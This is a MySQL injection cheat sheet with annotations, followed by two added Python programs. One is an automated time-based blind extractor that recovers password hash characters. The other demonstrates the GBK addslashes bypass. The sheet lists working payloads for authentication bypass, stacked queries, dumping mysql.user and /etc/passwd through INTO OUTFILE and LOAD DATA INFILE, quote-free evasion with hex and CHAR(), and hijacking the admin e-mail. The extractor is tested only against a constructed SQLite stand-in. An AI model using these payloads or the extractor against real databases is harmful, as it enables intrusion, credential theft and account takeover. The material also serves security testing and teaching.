MySQL Injection Cheat Sheet

1. Basics.

[code lang-sql]SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
-- AND binds tighter than OR, so the last one reads: id = 1 OR (1=1 AND user LIKE "%root%")
[/code]

2. Variations.
[code lang-sql]SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
[/code]
Caveat: MySQL's lexer treats an inline comment as whitespace, so WHE/**/RE is two tokens and a syntax error. The comment trick only helps where a filter strips spaces; put the comments between tokens instead, e.g. SELECT/**/*/**/FROM/**/login/**/WHERE/**/id=1/**/OR/**/1=1

3. Stacked queries: SHOW TABLES, VERSION(), mysql.db
[code lang-sql]SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db FROM mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; SELECT host,user,db FROM mysql.db;
[/code]
The statement after the ";" only runs if the client API sends multiple statements per call: PHP's mysql_query() does not, mysqli_multi_query() does. Reading mysql.db needs SELECT privilege on the mysql schema.

4. Blind injection vectors.
4-1) Operators
[code lang-sql]SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
[/code]
4-2) Evaluate (each of these returns 1, i.e. TRUE)
[code lang-sql]SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);   -- division by zero yields NULL in a SELECT
[/code]
4-3) Math
[code lang-sql]SELECT FLOOR(7 + (RAND() * 5));   -- an integer from 7 to 11
SELECT ROUND(23.298, -1);           -- 20
[/code]
4-4) Misc
[code lang-sql]SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
[/code]
4-5) Benchmark
[code lang-sql]SELECT BENCHMARK(10000000,ENCODE('abc','123'));
-- about 5 seconds on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)));
-- about 7 seconds on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)));
-- about 70 seconds on a localhost
[/code]
The timings are the original 2007 figures; current hardware is far faster, so calibrate the round count against the target before relying on a delay. ENCODE() was removed in MySQL 8.0; use MD5() or SHA1() as the repeated expression there.
4-6) Using the delay to check whether a user exists
[code lang-sql]SELECT IF(user = 'root', BENCHMARK(1000000,MD5('x')), NULL) FROM login
[/code]
Beware of the round count: add an extra zero and the request can stall long enough to hang or crash your browser. BENCHMARK() runs once for every row where the condition holds, so the delay scales with the number of matching rows.

5. Gathering info
5-1) Table mapping
[code lang-sql]SELECT COUNT(*) FROM tablename
[/code]
5-2) Field mapping
[code lang-sql]SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
[/code]
5-3) User mapping
[code lang-sql]SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'
[/code]

6. Advanced SQL vectors
6-1) Writing info into files
[code lang-sql]SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'
[/code]
Requires the FILE privilege. The file is created by the mysqld user and must not already exist. If secure_file_priv names a directory, writes are confined to it; if it is NULL, INTO OUTFILE is disabled entirely (MySQL 5.7 and later set it by default).
6-2) Writing info into files without single quotes: (example)
[code lang-sql]SELECT password FROM tablename WHERE username = CHAR(97,100,109,105,110)
INTO OUTFILE '/path/location/on/server/www/passes.txt'
[/code]
CHAR(97,100,109,105,110) is 'admin'. Do not wrap it in CHAR(39): 39 is the quote character itself and would become part of the compared value. INTO OUTFILE accepts only a plain string literal, so CONCAT()/CHAR() cannot replace the quotes around the file name; only the WHERE value can be made quoteless.

Note: You must specify a new file, it may not already exist, and give the correct pathname!
6-3) The CHAR() quoteless function
[code lang-sql]SELECT * FROM login WHERE user = CHAR(97,100,109,105,110)   -- 'admin'

SELECT * FROM login WHERE user = CHAR(97)                     -- 'a'
[/code]
CHAR() takes the byte values directly; there is no need for CONCAT(), and CHAR(39) (the quote) must be left out or it is compared as part of the string.
6-4) Extracting hashes
[code lang-sql]SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),NULL) FROM login
[/code]
example:
[code lang-sql]SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),NULL) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),NULL) FROM login
[/code]
A slow response means the guessed prefix is right. The UNION SELECT above has no WHERE clause, so any row whose field starts with the guess triggers the delay; add WHERE user = 'admin' to the UNION part to test a single account. Guessing one character per probe keeps the candidate set small (36 per position for 0-9 and a-z).
6-5) Explaining SUBSTRING(passwordfield, startcharacter, selectlength), for a field beginning with abcd:
[code lang-sql]SUBSTRING(password,1,2)   -- selects 'ab'
SUBSTRING(password,1,3)   -- selects 'abc'
SUBSTRING(password,1,4)   -- selects 'abcd'
[/code]
6-6) A quoteless example:
[code lang-sql]SELECT user FROM login WHERE user = CHAR(97,100,109,105,110)
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),NULL) FROM login
[/code]
CHAR(97,100,109,105,110) is 'admin' and CHAR(59) is ';'. Possible chars: 0 to 9 = ASCII 48 to 57, a to z = ASCII 97 to 122.
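Putting 6-3 through 6-6 together, here is an added example (not from the original cheat sheet) that drives the timing probe automatically and recovers a field one character at a time. It runs against an in-memory SQLite database standing in for MySQL: MD5(), BENCHMARK() and SUBSTRING() are registered as Python stand-ins, the login table and its truncated hash are constructed data, and the vulnerable lookup() concatenates its argument into the query the way the target application on this page would. The hex and CHAR() encoders used in the Advanced Vectors section are included as well.

```python
# Added example, not from the original cheat sheet. Everything below
# (table contents, hash values, the lookup() application) is constructed.
import hashlib
import sqlite3
import time

ROUNDS = 30000  # BENCHMARK count for the demo; the page uses 1000000 on MySQL


def _benchmark(count, _expr):
    # Stand-in for MySQL BENCHMARK(): SQLite evaluates `_expr` once before
    # calling us, so the repeated work is done here (hash `count` times).
    h = b"x"
    for _ in range(int(count)):
        h = hashlib.md5(h).digest()
    return 0


def make_vulnerable_app():
    """Return lookup(username), which pastes its argument straight into SQL."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("MD5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.create_function("BENCHMARK", 2, _benchmark)
    conn.create_function("SUBSTRING", 3,
                         lambda s, start, n: str(s)[start - 1:start - 1 + n])
    conn.execute("CREATE TABLE login (id INTEGER, user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?, ?)",
                     [(1, "admin", "5f4dcc3b"),   # constructed, truncated hash
                      (2, "guest", "084e0343")])

    def lookup(username):
        sql = "SELECT user FROM login WHERE user = '" + username + "'"
        return conn.execute(sql).fetchall()

    return lookup


def to_hex_literal(s):
    """'root' -> 0x726F6F74, the hex form from the Advanced Vectors section."""
    return "0x" + s.encode().hex().upper()


def to_char_call(s):
    """'admin' -> CHAR(97,100,109,105,110), the 6-3 quoteless form."""
    return "CHAR(" + ",".join(str(b) for b in s.encode()) + ")"


def probe(position, codepoint, target="admin", rounds=ROUNDS):
    # The 6-4 payload with two changes: MySQL IF() is written as CASE WHEN,
    # because SQLite evaluates every argument of a user function eagerly and
    # would run BENCHMARK() on the false branch too; and the UNION SELECT is
    # scoped with WHERE so only the target row can trigger the delay.
    # The only quote is the one closing the application's own literal.
    return ("x' UNION SELECT CASE WHEN SUBSTRING(pass,%d,1) = CHAR(%d) "
            "THEN BENCHMARK(%d,MD5(CHAR(59))) ELSE NULL END "
            "FROM login WHERE user = %s -- "
            % (position, codepoint, rounds, to_char_call(target)))


def timed(lookup, payload):
    t0 = time.perf_counter()
    lookup(payload)
    return time.perf_counter() - t0


def calibrate(lookup, rounds=ROUNDS):
    # Midpoint between a known-slow and a known-fast probe is the threshold.
    slow = min(timed(lookup, "x' UNION SELECT BENCHMARK(%d,MD5(CHAR(59))) -- " % rounds)
               for _ in range(3))
    fast = max(timed(lookup, "x' UNION SELECT NULL -- ") for _ in range(3))
    return (slow + fast) / 2


CANDIDATES = list(range(48, 58)) + list(range(97, 123))  # 0-9, a-z as in 6-6


def extract(lookup, length, target="admin", rounds=ROUNDS):
    """Recover `length` characters of the target's pass field by timing."""
    threshold = calibrate(lookup, rounds)
    found = ""
    for pos in range(1, length + 1):
        for cp in CANDIDATES:
            if timed(lookup, probe(pos, cp, target, rounds)) > threshold:
                found += chr(cp)
                break
        else:
            found += "?"  # character outside the candidate set
    return found


if __name__ == "__main__":
    print(to_hex_literal("root"), to_char_call("admin"))
    print(extract(make_vulnerable_app(), 8))
```

calibrate() decides on the midpoint between a known-slow and a known-fast probe; against a real server over a network you would repeat each probe and compare medians, since jitter can exceed a single BENCHMARK delay. The WHERE clause on the UNION SELECT matters: without it, any row whose field matches the guess slows the response, which is the ambiguity in the page's own 6-4 payload.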

7. Misc
7-1) Insert a new user into the DB
[code lang-sql]INSERT INTO login SET user = 'r00t', pass = 'abc'
[/code]
7-2) Retrieve the /etc/passwd file, put it into a field and insert a new user
[code lang-sql]LOAD DATA INFILE '/etc/passwd' INTO TABLE login (profiletext, @var1) SET user = 'r00t', pass = 'abc';
[/code]
Each line of the file becomes one row, with the line in profiletext and user/pass set to r00t/abc, so you get a login row per line of /etc/passwd. Then log in! Requires the FILE privilege, and secure_file_priv restricts the read just as it restricts INTO OUTFILE.
7-3) Write the DB users away into /tmp
[code lang-sql]SELECT host,user,password FROM mysql.user INTO OUTFILE '/tmp/passwd';
[/code]
From MySQL 5.7.6 the column is authentication_string rather than password. Requires FILE and SELECT on mysql.user, and secure_file_priv must allow /tmp.
7-4) Change admin e-mail, for “forgot login retrieval.”
[code lang-sql]UPDATE users SET email = 'mymail@site.com' WHERE email = 'admin@site.com';
[/code]

8. Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

8-1) Bypassing addslashes() with GBK encoding

[code lang-sql]WHERE x = 0xbf27admin 0xbf27
[/code]
Read 0xbf27 as the raw bytes BF 27 in the request, not as a hex literal. addslashes() puts a backslash (5C) before the quote (27), giving BF 5C 27; on a GBK connection BF 5C is one valid double-byte character, so the 27 that follows is a bare quote again and closes the string.
8-2) Bypassing mysql_real_escape_string() with BIG5 or GBK
[code lang-sql]"injection string"
[/code]
The injection string in the original was a run of Chinese Big5 characters that did not survive re-encoding in this copy; the mechanism is the same as in 8-1, with a Big5 lead byte swallowing the inserted backslash. mysql_real_escape_string() is only charset-aware when the connection character set is set through the client API (mysql_set_charset()); setting it with SET NAMES does not tell the client library which byte pairs form one character.
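The byte-level mechanics of 8-1 and 8-2, as an added example that is not part of the original sheet: addslashes() below is a Python re-implementation of PHP's byte-wise escaping, and the payload, query template and the GBK versus latin-1 comparison are constructed for the demonstration. charset_aware_escape() stands in for what a correctly configured escaper must do (decode in the connection charset first, then escape characters); this version rejects byte sequences that are not valid characters outright, which is stricter than the C library's handling.

```python
# Added example, not from the original cheat sheet; payload and query
# template are constructed for the demonstration.
QUERY = b"SELECT * FROM login WHERE user = '%s'"
PAYLOAD = b"\xbf\x27 OR 1=1 -- "   # BF = a GBK lead byte, 27 = the quote


def addslashes(data):
    """Byte-wise escaping like PHP addslashes(): backslash before ' " \\ NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def server_view(user_input, charset):
    """The statement text as the server decodes it on a `charset` connection."""
    return (QUERY % addslashes(user_input)).decode(charset, errors="replace")


def live_quotes(sql):
    """Count single quotes not preceded by a backslash character.

    A well-formed literal has exactly two; a third one means the input
    broke out of the string.
    """
    return sum(1 for i, ch in enumerate(sql)
               if ch == "'" and (i == 0 or sql[i - 1] != "\\"))


def charset_aware_escape(data, charset):
    """Decode first, escape in character space, re-encode.

    Bytes that are not valid in the connection charset are rejected (None)
    rather than passed through, so a stray lead byte cannot pair up with
    the backslash that is inserted afterwards.
    """
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = "".join("\\" + c if c in "'\"\\\x00" else c for c in text)
    return escaped.encode(charset)


if __name__ == "__main__":
    for cs in ("latin-1", "gbk"):
        view = server_view(PAYLOAD, cs)
        print(cs, live_quotes(view), view)
    print(charset_aware_escape(PAYLOAD, "gbk"))
    print(charset_aware_escape(b"O'Brien", "gbk"))
```

On a latin-1 connection the escaped bytes decode to ... = '¿\' OR 1=1 -- ' and the quote stays inside the literal; on a GBK connection BF 5C decodes to a single CJK character and the same bytes read as ... = '縗' OR 1=1 -- ', with the OR now outside the string. The durable fix is a parameterised query, where user input never reaches the SQL parser at all.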

Advanced Vectors

1. Using a HEX encoded query to bypass escaping.

[code lang-sql]Normal:
SELECT * FROM login WHERE user = 'root'

Bypass:
SELECT * FROM login WHERE user = 0x726F6F74
[/code]
A hex literal in string context is a binary string, so the comparison is byte-wise and case-sensitive.

2. Inserting a new user in SQL.
[code lang-sql]Normal:
INSERT INTO login SET user = 'root', pass = 'root'

Bypass:
INSERT INTO login SET user = 0x726F6F74, pass = 0x726F6F74
[/code]

3. How to determine the HEX value for injection.
[code lang-sql]SELECT HEX('root');
-- gives you: 726F6F74
-- prefix it with 0x: 0x726F6F74
[/code]

Source: http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/ (link removed because the site was distributing malware.)
